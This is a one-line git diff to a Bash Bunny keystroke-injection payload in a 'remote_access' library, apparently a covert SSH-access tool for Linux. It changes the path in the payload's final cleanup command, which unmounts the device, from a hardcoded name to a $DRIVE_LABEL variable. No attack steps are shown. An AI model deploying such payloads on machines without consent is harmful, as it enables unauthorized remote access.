payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt b/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt index 3509faa1..1033e110 100644 --- a/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt +++ b/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt @@ -43,7 +43,7 @@ QUACK ENTER QUACK DELAY 100 # Bye Felicia! -QUACK STRING umount '/media/$USER/BashBunny' +QUACK STRING umount '/media/$USER/$DRIVE_LABEL' QUACK ENTER QUACK DELAY 25